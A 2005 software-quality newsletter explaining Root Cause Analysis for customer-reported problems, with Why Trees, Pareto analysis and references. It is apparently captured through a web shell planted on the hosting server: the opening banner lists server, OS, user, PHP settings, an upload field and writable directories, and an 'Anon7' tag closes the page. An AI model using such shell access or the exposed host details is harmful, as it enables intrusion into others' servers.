KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/srakitin/OLD/newsletter/vol2/no5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/srakitin/OLD/newsletter/vol2/no5/vol2no5.txt
Food for Thought: Getting to the Root of Customer Reported Problems
An e-newsletter published by Software Quality Consulting, Inc.
May 2005, Vol. 2 No. 5 

To view a web version of this newsletter, click on the following link:
http://www.swqual.com/newsletter/vol2/no5/vol2no5.html.

--------------------------------------------------------------------------------

Welcome to Food for Thought(TM), an e-newsletter from Software Quality 
Consulting (http://www.swqual.com/?Intro). I've created free subscriptions for
my valued business contacts. If you find this newsletter informative, I
encourage you to continue reading. Feel free to pass this newsletter along to
colleagues by clicking this Forward Email link
(http://ui.constantcontact.com/roving/sa/fp.jsp?plat=i&p=f&m=sctz69n6). If
you�ve received this newsletter from a colleague and would like to subscribe,
please click this Enter New Subscription link
(http://www.swqual.com/newsletter/Subscribe.htm). If you don't wish to receive
this newsletter, click the SafeUnSubscribe(TM) link at the bottom of this
newsletter, and you won�t be bothered again.

Your continued feedback on this newsletter is most welcome. Please send 
your comments and suggestions to [email protected]. 

--------------------------------------------------------------------------------

In This Months� Topic, I discuss using Root Cause Analysis to find the 
real cause of Customer Reported Problems... 

Regular features to look for each month are:

- Monthly Morsels
  Hints, tips, techniques and reference info related to this month�s topic 

- Calendar
  Conferences, workshops, and meetings of interest to software engineers, 
  QA engineers and anyone interested in software development 

--------------------------------------------------------------------------------

***This Month�s Topic***

GETTING TO THE ROOT OF CUSTOMER REPORTED PROBLEMS

Of all the kinds of problems that software development organizations face, 
Customer Reported Problems (CRPs) are clearly the most important. This is 
because CRPs represent potential gaps in your knowledge of how your 
customers use your software. CRPs may be the result of deficiencies in 
your product marketing, software development, test, or fulfillment 
processes. CRPs can often result in unplanned releases that are both 
disruptive and expensive. 

When the underlying cause of CRPs are not fully understood, they can 
result in poor solutions that often create more problems than they solve. 
Nothing frustrates customers more than a supplier who is unable to resolve 
problems quickly and with correctly.

MOTIVATION

By now, we should all know that the sooner a problem is found the easier 
and less costly it is to fix. Barry Boehm [1] demonstrated this almost 25 
years ago. Current data [2] suggest that even the most experienced 
developers inject one defect for every 10 lines of code they write. While 
effective testing can find up to 95% of these defects prior to release, 
that still leaves quite a few defects for customers to find. 

Finding critical defects in your software is very disruptive not only for 
your customers but for your software development organization as well. 
Unplanned releases to fix CRPs divert expensive development resources from 
tasks that generate revenue (new features, new products, etc.) to tasks 
that don�t generate revenue (bug fixes). Unplanned releases are clearly 
not good for your bottom line. 

CRPs represent more than just defects. CRPs should be broadly defined to 
include any failure of software and services (including code, 
documentation, installation, customization, fulfillment, training, etc.) 
that negatively impacts customers. 

ROOT CAUSE ANALYSIS 

Working in safety-critical industries has allowed me to become familiar 
with several tools not routinely used in the commercial software 
development industry. One such tool is called Root Cause Analysis (RCA). 
This tool is commonly used within a Six-Sigma framework. 
I�ve adapted the traditional RCA Process to make it work effectively 
within typical software development organizations. RCA helps people 
understand WHAT, WHY, and HOW an event (a CRP) occurred. 
Overview

RCA is routinely used to investigate the cause of major disasters 
including: 

- Airline crashes 
- Space Shuttle accidents 
- Chemical and nuclear plant disasters 

RCA helps us:

- understand causes of customer dissatisfaction 
- understand the what, the why, and the how... 
- reduce rework by preventing recurrence 
- identify process weaknesses 
- improve customer satisfaction 

In applying RCA to a typical software development organization, we need to 
keep in mind the fact that finding the root cause of a CRP may be 
difficult because:

- We often have an incomplete problem definition 
- Causal relationships are unknown 
- We tend to focus on finding quick solutions and assigning blame 

Let�s now look at terms specific to the RCA process.

TERMINOLOGY

The RCA Process uses the following terms: 

EventAny - failure of software and services (including code, 
documentation, installation, customization, training, fulfillment, 
etc.) that impacts customers. A CRP is an example of an event.

Causal Factors - Factors that contribute to occurrence of an event.

Causal Relationships - Cause and effect sequence in which a specific 
action creates a condition that contributes to or results in an 
event.

Corrective Action - Specific actions taken to eliminate root cause of 
a CRP. There are two kinds of Corrective Actions (CAs):
 
- Immediate CA is taken soon after CRP is reported to help customer 
  recover (examples: workaround, hot fix, etc.) 
- Long Term CA taken to prevent recurrence. Long Term CA results in 
  changes to process and procedures 

Root Cause - Cause that, if corrected, prevents recurrence of this and 
similar CRPs. 

Attributes of root causes: 
- Represent specific underlying causes of events... 
- Can be reasonably identified... 
- Can be fixed by Management... 
- Lead to effective corrective actions... 

Let�s look a bit closer at the attributes of root causes:

- Root Causes represent specific underlying causes ofCRPs 
  - The goal of RCA is to find specific underlying causes 
  - The more specific the investigation is about why a CRP occurred, the 
    easier it will be to arrive at CAs that will prevent recurrence 

- Root Causes can be reasonably identified...

  - The RCA investigation must be cost-effective
  - A good RCA Process helps keep ROI high 

- Root Causes can be fixed by Management... 

  - Management needs to know exactly why a CRP occurred before effective 
    CA can be taken to prevent recurrence
  - Vague root causes such as �user error�, �software failure�, or 
    �external factors� are not helpful because Management can�t do much 
    about them


- Root Causes lead to effective Corrective Actions...
 
  - Corrective actions are directly related to the identified root causes 
  - Vague corrective actions mean specific root cause was not found 

Now that we have some terms defined, let�s look at the Root Cause Analysis 
Process.

RCA PROCESS OVERVIEW

The RCA Process consists of investigating, understanding, and categorizing 
underlying root causes of observed CRPs. It can be best performed by a 
small cross-functional team and can be easily incorporated into your 
Defect Triage Process.

The RCA Process includes a detailed a nalysis based on gathering factual 
information obtained from:

- Available documents and records 
- Interviews with staff and customers 
- Brainstorming sessions with staff 

And the RCA Process uses simple tools including:

- Why Trees 
- Pareto Analysis 

An effective RCA Process helps determine appropriate and effective 
corrective actions by identifying both an Immediate Corrective Action 
(what should be done today to resolve the CRP) and Long Term Corrective 
Action (what should be done to prevent recurrence).

In applying the RCA Process, the Triage Team starts with a specific CRP 
and asks:

- What is it about way we operate that allowed this CRP to occur? 

Most root causes are found in way we operate. That includes:

-   Who does what? 
-   How things get done? 
-   Why we behave way we do? 

The Triage Team asks questions about �Who does what�, �How things get 
done�, and �Why we behave the way we do�, in order to identify factual 
information that can be helpful in identifying real root causes.

In asking these questions, the Triage Team uses a tool called the Why 
Tree. Why Trees are similar to Fault Trees in that the CRP is placed at 
the top. We then ask �Why did this happen?� and start drilling down into 
�Who does what�, �How things get done�, and �Why we behave the way we do�. 
At each level, the team continues to ask �Why� � usually at least five 
times (though for simpler problems, less than five Whys may suffice).

The following illustrates a partially completed Why Tree for a simple 
problem: 

(see the image in the HTML version �
http://www.swqual.com/newsletter/vol2/no5/vol2no5.html.)

Answers to Why questions may need to be determined from documents (like 
Functional Specifications, Test Plans, User Manuals, etc.), from records 
(like test results, shipping invoices, etc.), from interviews with staff 
and customers, and from brainstorming sessions.

The information shown in green circles on the Why Tree example represents 
probable root causes. The Triage Team reaches consensus on the most 
probable root cause(s). Often, there will be more than one root cause.

Using the Why Tree, the Triage Team develops an Immediate CA (which could 
be a workaround, hot fix, patch, new CDs, new doc, etc.). The team also 
identifies effectiveness checks that can determine if the Immediate CA, 
once implemented, has effectively resolved the CRP.

Once the Immediate CA is implemented and the effectiveness checks are 
satisfactory, the Triage Team decides if a Long Term CA is needed. A Long 
Term CA would be appropriate if the root cause points to systemic 
problems. If so, they begin to develop a Long Term CA. The team does this 
by:

- Reviewing existing processes and procedures 
- Identifying process weaknesses directly related to root cause 
- Identifying potential process and procedure changes 
- Identifying long term effectiveness checks 

Once the team has competed work on the Long Term CA, it can be presented 
to Management and implemented. The team then collects data to determine if 
long term effectiveness checks are satisfactory.

Now let�s identify the specific steps needed to perform an effective RCA.

RCA PROCESS STEPS

Step 1 - Data Collection 

The majority of time spent analyzing events will be spent gathering data. 
Complete information and a thorough understanding of events required to 
identify causal factors and real root causes.

- Data collection begins with an accurate statement of what occurred in 
  the Customer�s words:

  - Descriptions of CRPs are sometimes �filtered� by Technical Support. It 
    is critical that the original problem stated in the Customer�s words 
    are recorded and reviewed by the team to prevent wasted effort... 
  - Data collection will initially be sketchy � use the Why Tree to 
    identify additional data to collect... 

- Collect general information about Customer. Some examples:

  - Is this Customer a power user or novice? 
  - Has this Customer received training? 
  - Is this Customer�s use and/or data unique? 

- Collect information about Customer�s environment. Some examples: 

  - Does this Customer have a standard release or customer-specific 
    release? 
  - What are their platform/database/operating system releases? 
    Have they received hot fixes recently? Are they installed?

Your Technical Support staff should gather this information by using a
checklist of questions to ask when Customers report problems. 

Step 2 � Determine What Happened

The Triage Team starts with the CRP in the Customer�s words and asks �Why 
did this happen?� As they start to drill down, they create the Why Tree 
and continue asking �Why?� until there are no more answers. Usually, you 
need to ask �Why?� a minimum of 5 times. 

This process will identify additional information to collect. For example:

-   Was the requirement defined in the Software Requirements Spec? 
-   Was the requirement ambiguous? 
-   Was the requirement tested? If so, how? 
-   Was the testing effective? 
-   Was user training provided? Was it effective? 
-   Are there platform, environment, or configuration issues? 

When the team is satisfied that they have answered all the relevant 
questions and gathered all relevant information, the team is then ready to 
identify potential root causes.

Step 3 - Root Cause Identification

Based on the Why Tree, the Triage Team reviews results and identifies most 
probable root causes. The team ensures that most probable root causes meet 
the following criteria:

-   They represent specific underlying causes of events... 
-   They can be reasonably identified... 
-   They can be fixed by Management... 
-   They can lead to effective corrective actions... 

Once the team is satisfied that they have identified the most probable 
root cause(s), they document their results.

With this information, the team can then identify an Immediate CA. These 
actions can be taken immediately to help resolve the original CRP. 
Effectiveness checks are included as part of the Immediate CA.

Step 4 � Long Term Corrective Action

Once an Immediate CA is implemented and determined to be effective, the 
Triage Team decides if a Long Term CA is warranted. Usually, root causes 
that identify underlying systemic problems are good candidates. Also, once 
root causes are identified, they should be added to a list, as illustrated 
below:

Example Root Cause List

1 Requirement was defined in SRS but not tested 
2 Requirement was tested but test was inadequate 
3 Requirement was not defined in SRS 
4 Requirement was in SRS but was ambiguous 
5 Code was incorrect � Code review not held 
6 Code was incorrect � Code review held but didn�t catch it 
7 Installation or configuration issues... 
8 Version compatibility issues... 
9 User training issues... 
10 etc... 

The Pareto Principle tells us that, in many cases, 80% of all problems 
result from only 20% of root causes. Performing a Pareto Analysis based on 
the Root Cause List can help determine what areas should be the focus of 
Long Term CA in order to keep the ROI high.

The following example illustrates a simple Pareto Analysis of observed 
root causes and their associated CRPs.

Example of Simple Pareto Analysis of Observed Root Causes
CRP    RC #1    RC #2    RC #3    RC #4 
10002    x                 x   
10014             x        x        x 
10045             x     
10345    x        x                 x 
16778             x     
17889   
18779             x     
19921             x     
19992   
20001             x     
total    2        7        2        2 

From this analysis it is clear that addressing Root Cause #2 with a Long 
Term CA would have the highest ROI. The Triage Team would identify and 
propose a Long Term CA and present recommendations to Management. Included 
with this are effectiveness checks. Once implemented, data is collected 
and reviewed by the Triage Team to ensure that the systemic issues have 
been effectively eliminated.

IN SUMMARY...

Incorporating RCA into your Triage Process can lead to several benefits:

-   Increases your ability to discover real root causes 
-   Helps identify WHAT, WHY, and HOW 
-   Leads to effective immediate and long term corrective actions 
-   Improves Customer Satisfaction 
-   Reduces rework and eliminates unplanned releases 

By incorporating Root Cause Analysis into your Triage Process, the 
resolution of your CRPs will be more effective and your customers will 
certainly be happier.

Till next time...

--------------------------------------------------------------------------------

***Monthly Morsel***

Every month in this space you�ll find additional information related to 
this month�s topic.

  References:

  [1] Boehm, B., Software Engineering Economics, Prentice-Hall, 1981

  [2] Humphrey, W., A Discipline for Software Engineering, Addison-Wesley, 
  1995.

  [3] Gano, D., et. al., Apollo Root Cause Analysis � A New Way Of 
  Thinking, Apollonian Publications, 1999

  [4] US Dept of Energy, Root Cause Analysis Guidance Document, 
  DOE-NE-STD-1004-92, February 1992
  A technical guidance document on how to perform traditional root cause 
  analysis, primarily used for investigating nuclear power plant 
  accidents. (http://www.eh.doe.gov/techstds/standard/nst1004/nst1004.pdf)

  [5] Rooney, J. and Vanden Heuvel, L., "Root Cause Analysis for 
  Beginners�, ASQ Quality Progress, July 2004, p. 45-53
  A good paper to read for an overview of the traditional Root Cause 
  Analysis process... 
  (http://www.asq.org/pub/qualityprogress/past/0704/qp0704rooney.pdf)

  [6] Fagerhaug, T., and Andersen, B. (ed.), Root Cause Analysis: 
  Simplified Tools and Techniques, ASQ Quality Press, 1999. 
  
  On-line Resources: 

  Software Forensics Centre at the School of Computing Science, 
  Middlesex University ( UK)
  An interesting site with lots of resources related to software 
  Failures (http://www.cs.mdx.ac.uk/research/SFC/index.html)

  ASQ Quality Press
  Search ASQ�s on-line bookstore for books and resources on Root Cause 
  Analysis (http://qualitypress.asq.org/index.html)

--------------------------------------------------------------------------------

***Calendar***

Every month, you�ll find news here about local and national events that 
are of interest to the software community...

  Software Quality Calendar

  There are many organizations that sponsor monthly meetings, workshops, 
  and conferences of interest to software professionals. Find out what�s 
  happening... (http://www.swqual.com/links/upcoming.html)
  
  Workshops Offered by Software Quality Consulting

  Software Quality Consulting offers workshops in many topics related to 
  software process improvement. Get more info... 
  (http://www.swqual.com/seminars/courses.html)

--------------------------------------------------------------------------------

***About SQC***

Software Quality Consulting provides consulting, training, and auditing 
services tailored to meet the specific needs of clients. We help clients 
fine-tune their software development processes and improve the quality of 
their software products. The overall goal is to help clients achieve 
Predictable Software Development(TM) � so that organizations can consistently 
deliver quality software with promised features in the promised timeframe.
To learn more about how we can help your organization, visit our web site
(http://www.swqual.com/) or send us an email ([email protected]).

--------------------------------------------------------------------------------

I hope this newsletter has been informative and helpful. Your comments and 
feedback are most welcome. Send me your feedback... ([email protected])
Thanks,

Steve Rakitin
[email protected]


Food for Thought and Predictable Software Development are trademarks of Software 
Quality Consulting, Inc. 
Copyright � 2005. Software Quality Consulting, Inc. All rights reserved. Graphic 
design by Sage Studio  

Anon7 - 2021